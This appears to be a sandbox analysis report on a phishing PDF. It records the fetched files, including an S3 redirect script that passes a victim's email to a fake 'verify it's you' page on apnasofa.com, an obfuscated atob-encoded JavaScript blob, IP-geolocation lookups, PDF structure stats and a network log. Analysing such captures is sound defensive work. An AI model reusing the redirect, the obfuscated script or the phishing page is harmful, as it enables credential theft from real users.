                                                        SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                                                        MD5:AC837B485BC1972521C7D36AE2F98F4C
                                                        SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                                                        SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                                                        SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                                                        Malicious:false
                                                        URL:https://apnasofa.com/episode/image/logo.png
                                                        Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):21
                                                        Entropy (8bit):3.463280517810811
                                                        Encrypted:false
                                                        SSDEEP:3:YMb1gXMlY:YMeX6Y
                                                        MD5:188A7DDAF69C860BAF90460AD507337F
                                                        SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                                                        SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                                                        SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                                                        Malicious:false
                                                        URL:https://api.ipify.org/?format=json
                                                        Preview:{"ip":"8.46.123.228"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8794)
                                                        Category:dropped
                                                        Size (bytes):8831
                                                        Entropy (8bit):5.2261593995743105
                                                        Encrypted:false
                                                        SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                                                        MD5:4C1820154EC47B89CA1BB86380227ADF
                                                        SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                                                        SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                                                        SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                                                        Malicious:false
                                                        Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):58
                                                        Entropy (8bit):4.245069356823525
                                                        Encrypted:false
                                                        SSDEEP:3:YWQRAW6k3RA8LQX+yKLrSNMR4:YWQmyRKjKLrVO
                                                        MD5:96CB1B42BD2A4803FCD22A65EA5DFC98
                                                        SHA1:CA4550A99C8B52EDDDCF7D9BFDFEEF85CD78D885
                                                        SHA-256:41C6BA69A3B925B7C2BCFB14F605DD01582E3AC3589D0247A70A0E7F24338904
                                                        SHA-512:DFFB9D78E91D994A6D4554EC08C3C15D1E63E68A97525B930EB109CA9A3CC52D8C9CA3B2BC5A65A645E35DA1AADDB568A8687DCA677B1460539F65CA2D35EF99
                                                        Malicious:false
                                                        URL:https://ipwhois.app/json/8.46.123.228
                                                        Preview:{"success":false,"message":"you've hit the monthly limit"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):442
                                                        Entropy (8bit):4.721509219116008
                                                        Encrypted:false
                                                        SSDEEP:6:hxuJzhqIziYcgAjMkBHFiodLcQSpvD9ocMYoQXrA6jMjmmHJ141NLcs4Nhdx434A:hYYxy4LKpvV+6ExHJabLZ4Nbx4IQL
                                                        MD5:495735A2F76DABA1413C4E6E2F30911B
                                                        SHA1:55A577F9EBC9CF60E5931A180CA2C4FF0F896444
                                                        SHA-256:199BD1DDBB59029F61EF8401DA07073AD36DD60EA32B3B2AFDE264DAE949AA58
                                                        SHA-512:413F3E6F0B8543D9826D638B4686443425EC4B6E5FF3602C9AD0A51472D660BF3935B17A0468DB3F8AAC6B3956B3FEF522E8801C8C4F3051E952A0F742BDEB23
                                                        Malicious:false
                                                        URL:https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <script>. // Get the encoded email parameter from the URL hash. var emailEncoded = window.location.hash.substring(1); // Remove the first character '#'.. // Redirect to the specified URL with the encoded email parameter. window.location.href = "https://apnasofa.com/episode/index#" + emailEncoded;. </script>.</head>.<body>.</body>.</html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):3703
                                                        Entropy (8bit):4.810174175624268
                                                        Encrypted:false
                                                        SSDEEP:48:czi9BzckSVg7FO9Ets2ve3N8h0BPKqh3GfXsZCSx53ZXHknhi:ukzczuM91IPhEL6sUSx53Z3qc
                                                        MD5:9A15E091F6B3FBF999B00CBD9E6FC5FC
                                                        SHA1:5F6E11417BEA2607EE9C34321C0180C981252767
                                                        SHA-256:70722747860D26455DCD955B57AE5FD9BF15B5A3D6D5CF0D83D413522DB4D11D
                                                        SHA-512:39B802D8F6A003C6BC7CE87D041664A67D1FA67D83C98B8515C93A51B22E71A16B3278253D7DE2A743BFA51DFF321BFB5B4C6B89A709C78AEF0AA8D0BB5D3D47
                                                        Malicious:false
                                                        URL:https://apnasofa.com/episode/style.css
                                                        Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. background-color: #FFFAFA;. font-family: 'Segoe UI', Arial, sans-serif;. line-height: 1.6;. color: #333;.}...container {. max-width: 800px;. margin: 40px auto;. padding: 20px;. background: #fff;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);.}../* Logo Styles */..logo-container {. text-align: center;. margin-bottom: 20px;. padding: 10px;.}...logo {. max-width: 160px;. height: auto;. margin: 0 auto;.}...verification-section {. text-align: center;. padding: 20px;.}...header {. margin-bottom: 30px;.}...header p {. font-size: 18px;. color: #666;.}../* Email Container Styles */..email-container {. margin: 30px auto;. max-width: 320px;. background: #f8f9fa;. padding: 20px;. border-radius: 6px;. border: 1px solid #e1e1e1;.}...email-box {. display: flex;. align-items: center;. justify-content: center;. gap: 10px
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):687
                                                        Entropy (8bit):5.036546324245533
                                                        Encrypted:false
                                                        SSDEEP:12:YdjYhZImV+xaNmd6wpHKVDosK9Ogi+Bumjc2sVYheq+5OFAtrHJKWeruN7wvX4uZ:Ydj0RNMhH79qmjc20QmJKpyNSX4i
                                                        MD5:A315E2D799EC6E5B18A86AB64FF7D179
                                                        SHA1:79626DC251FBA9CBA353C089011F038843C502BE
                                                        SHA-256:E9451E48696A0ECE088DEF6AB66EE2BE8BB46F3BC4C07448C77999882626AA93
                                                        SHA-512:75072715C413DE825F8F01DEB8E5490863B7CD1A612B240BAE36CF8E3DD75888ABE99678F4E022BBAD0E6E6554C09AC2A31BF11F6805BBEC5CF687C7F11AFA7D
                                                        Malicious:false
                                                        Preview:{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_phone":"+1","country_neighbours":"CA,MX","region":"New York","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"asn":"AS3356","org":"CenturyLink Communications, LLC","isp":"Level","timezone":"America\/New_York","timezone_name":"EST","timezone_dstOffset":0,"timezone_gmtOffset":-18000,"timezone_gmt":"-05:00","currency":"US Dollar","currency_code":"USD","currency_symbol":"$","currency_rates":1,"currency_plural":"US dollars"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):21327
                                                        Entropy (8bit):7.8373557915707295
                                                        Encrypted:false
                                                        SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
                                                        MD5:AC837B485BC1972521C7D36AE2F98F4C
                                                        SHA1:7901F7AA68B555EFBAA1AD95C9AF1DA21AFD72E0
                                                        SHA-256:25BB457F05BE6DE51815D6619758F22BD413A5DDE4BFFAEDB075DB06D7B9B8F2
                                                        SHA-512:0982C31327AEBCD107E382F317715FCF774CD14DAA3235592ED79930B2BD10F331DBB75565558F50C85AB16A75923DBBB4C0971AA5676A517EFADEDB2E0B5B48
                                                        Malicious:false
                                                        Preview:.PNG........IHDR...O...4.....D.{.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..R.IDATx...Kr.I. Z...7.+ .n....9...5o3"W .q...@K...2.yQ...WP......x7..p..(>@..w.8.,.YY)!...w.................................7.y.........c_2.R....._..>..a.~L. ..|...........k.............9^i&..........$........<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........O.........O.........).........)......@.<.......X.<...........................A........`A........ .........,...........S.........S....... x........ x.........I.......tzz:n?F..o.w.w_.W]..y.......T..6A...........c........>..w......5.L..^K......x......(]..na'..T...|<;;......O.....W9==.[.......j'x......H:.t..m...P;.S....`-...@........O:==....!.y......$......szz..4.......Xy..........].q.l......).@................n
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):21
                                                        Entropy (8bit):3.463280517810811
                                                        Encrypted:false
                                                        SSDEEP:3:YMb1gXMlY:YMeX6Y
                                                        MD5:188A7DDAF69C860BAF90460AD507337F
                                                        SHA1:530621CCC828AAB3930603814EF80EF1A79103AC
                                                        SHA-256:FE0DA54F56BE632726C7892705F471CC075255DA9D2CEA63AF62699C05FB0A29
                                                        SHA-512:C35AA31D95F3CBA835760FF8434D3B44E4607A43B068480FC9F6599BDADA6B53B362923820ADF073C898D8DDE9515F726F2B7C65662428A5D845116C87D5DC07
                                                        Malicious:false
                                                        Preview:{"ip":"8.46.123.228"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):1471
                                                        Entropy (8bit):4.503003910018644
                                                        Encrypted:false
                                                        SSDEEP:24:hYkCnJyyX5OQm06DRiaRvusNNoZPddWBHZ4T:GlURiYhodWBHGT
                                                        MD5:81D8BB621BA6DDE48C3AF9A15405F15C
                                                        SHA1:AC555BEC026EB9BF2E8DB8872F84F918CE8EEDDF
                                                        SHA-256:C3F0AC0A08C17363CF98B835232E5FC783425538895E2ED0C6FDF686BC627BD1
                                                        SHA-512:E6E59B1994A1713A4915B9293FAE487CDFD5081E02A02FAAFC0580AD34AEBA1816011CB91968CDE2CA400175C8BFF0169B9854CF138B8450DB39A37B587D8968
                                                        Malicious:false
                                                        URL:https://apnasofa.com/episode/index
                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>pleased</title>. <link rel="stylesheet" href="style.css">.</head>.<body>. <div class="container">. <div class="section verification-section">. <div class="logo-container">. <img src="image/logo.png" class="logo" alt="Logo">. </div>.. <div class="header">. We need to verify it's you. </div>.. <div class="email-container">. <div class="email-box">. <input type="email" id="emailInput" name="email_input" placeholder="Enter your email address" required>. </div>.. <div id="emailError" class="email-error"></div>.. <button class="submit-btn">Verify</button>. </div>.. <div id="emailLoader" class="loader" style="display: none;">. <div
                                                        File type:PDF document, version 1.4, 1 pages
                                                        Entropy (8bit):7.843090176868954
                                                        TrID:
                                                        • Adobe Portable Document Format (5005/1) 100.00%
                                                        File name:Employee_Important_Message.pdf
                                                        File size:38'301 bytes
                                                        MD5:bce83ede925d81678ca16b935128a92f
                                                        SHA1:86c99ea9b6a86d7f85ec98a2d6c7e8ac9a618f89
                                                        SHA256:4e23522eb1e5fcb1dbaf397d053f51ce1ca81c282fb2020e2c67a4c2b2703ae4
                                                        SHA512:ed4ce2250c7280e85379774250965234f6120122b21fcc83f58509156af19b0d0533b0d0e60822c25390db14d7ec3a9951faa15a1a722889e67e91ce1545cf6b
                                                        SSDEEP:768:DgDI6Jfa6yr9FEEyhi3f19HYdOg9Y68a8PSOOo6lOisu:Dgs6YJEEB19HYv9ROOVlTsu
                                                        TLSH:2503CFA47D0A1C1CF4EF826ACDA166DD0B2CB17BCEC57557302285A278C4FA13225E6E
                                                        File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...H.a.p.p.y. .B.i.r.t.h.d.a.y)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20241129060634-08'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.0./CA 1.0./A
                                                        Icon Hash:62cc8caeb29e8ae0

                                                        General

                                                        Header:%PDF-1.4
                                                        Total Entropy:7.843090
                                                        Total Bytes:38301
                                                        Stream Entropy:7.905905
                                                        Stream Bytes:34547
                                                        Entropy outside Streams:5.163065
                                                        Bytes outside Streams:3754
                                                        Number of EOF found:1
                                                        Bytes after EOF:
                                                        NameCount
                                                        obj26
                                                        endobj26
                                                        stream7
                                                        endstream7
                                                        xref1
                                                        trailer1
                                                        startxref1
                                                        /Page1
                                                        /Encrypt0
                                                        /ObjStm0
                                                        /URI0
                                                        /JS0
                                                        /JavaScript0
                                                        /AA0
                                                        /OpenAction0
                                                        /AcroForm0
                                                        /JBIG2Decode0
                                                        /RichMedia0
                                                        /Launch0
                                                        /EmbeddedFile0

                                                        Image Streams

                                                        IDDHASHMD5Preview
                                                        6002b2b2b2b2b2b007499a97e5157a325dbdcaf0b43258d46
                                                        10190d454959516355b0e757a8ca34cbf66f9eb93ccb4ee6a3
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 29, 2024 14:29:47.452316999 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:47.755798101 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:48.361782074 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:49.562781096 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:49.950325966 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:49.950368881 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:49.950839996 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:49.951020956 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:49.951035023 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.703326941 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.703763008 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:51.703775883 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.704967976 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.705068111 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:51.706110001 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:51.706182957 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.706294060 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:51.706301928 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:51.756814957 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:51.964797020 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:52.018594027 CET4969080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:29:52.525971889 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:52.526489019 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:52.526508093 CET44349697142.250.181.67192.168.2.16
                                                        Nov 29, 2024 14:29:52.526572943 CET49697443192.168.2.16142.250.181.67
                                                        Nov 29, 2024 14:29:52.710220098 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:52.710253000 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:52.710325003 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:52.710561037 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:52.710576057 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.319262028 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:54.319282055 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:54.319372892 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:54.321192026 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:54.321206093 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:54.491997004 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.492307901 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:54.492325068 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.493204117 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.493266106 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:54.494800091 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:54.494856119 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.494966030 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:54.494975090 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:54.547760010 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:54.585859060 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:54.585896015 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:54.585961103 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:54.586267948 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:54.586282015 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:55.391846895 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:55.391973972 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:55.392148972 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:55.393584013 CET49704443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:55.393603086 CET44349704172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:55.395442963 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:55.395462036 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:55.395642996 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:55.395755053 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:55.395767927 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:55.616153955 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:29:55.675462961 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:55.675584078 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:55.678688049 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:55.678694010 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:55.678962946 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:55.721575022 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:55.767321110 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:55.917805910 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:29:56.172492981 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.172585011 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.172640085 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.172667027 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.172677994 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.172688961 CET49709443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.172693968 CET443497092.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.207892895 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.207935095 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.208024979 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.208281994 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:56.208297968 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:56.347014904 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:56.347318888 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:56.347331047 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:56.348403931 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:56.348512888 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:56.353277922 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:56.353343964 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:56.393827915 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:56.393837929 CET44349711142.250.181.100192.168.2.16
                                                        Nov 29, 2024 14:29:56.441816092 CET49711443192.168.2.16142.250.181.100
                                                        Nov 29, 2024 14:29:56.520837069 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:29:56.776797056 CET49673443192.168.2.16204.79.197.203
                                                        Nov 29, 2024 14:29:57.132010937 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:57.132267952 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:57.132282972 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:57.132567883 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:57.132994890 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:57.133057117 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:57.133193970 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:57.175337076 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:57.612627029 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:57.612709045 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:57.614048958 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:57.614058971 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:57.614296913 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:57.617969036 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:57.663336992 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:57.732789993 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:29:58.128324986 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:58.128401995 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:58.128590107 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:58.129383087 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:58.129405975 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:58.129419088 CET49715443192.168.2.162.18.84.141
                                                        Nov 29, 2024 14:29:58.129425049 CET443497152.18.84.141192.168.2.16
                                                        Nov 29, 2024 14:29:58.207016945 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:58.207102060 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:58.207149982 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:58.207511902 CET49714443192.168.2.16172.217.19.227
                                                        Nov 29, 2024 14:29:58.207531929 CET44349714172.217.19.227192.168.2.16
                                                        Nov 29, 2024 14:29:58.536825895 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:29:58.536859989 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:29:58.536967039 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:29:58.537206888 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:29:58.537218094 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:29:58.841379881 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:29:58.841408014 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:29:58.841481924 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:29:58.842730999 CET49717443192.168.2.16172.202.163.200
                                                        Nov 29, 2024 14:29:58.842746019 CET44349717172.202.163.200192.168.2.16
                                                        Nov 29, 2024 14:30:00.007119894 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.007399082 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.007412910 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.008505106 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.008579016 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.008586884 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.008630037 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.009510994 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.009593964 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.009680986 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.009686947 CET4434971616.182.103.34192.168.2.16
                                                        Nov 29, 2024 14:30:00.050803900 CET49716443192.168.2.1616.182.103.34
                                                        Nov 29, 2024 14:30:00.081973076 CET4968080192.168.2.16192.229.211.108
                                                        Nov 29, 2024 14:30:00.145797968 CET49678443192.168.2.1620.189.173.10
                                                        Nov 29, 2024 14:30:00.316806078 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:00.316842079 CET4434971823.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:00.316914082 CET49718443192.168.2.1623.195.76.153
                                                        Nov 29, 2024 14:30:00.317014933 CET49719443192.168.2.1623.195.76.153
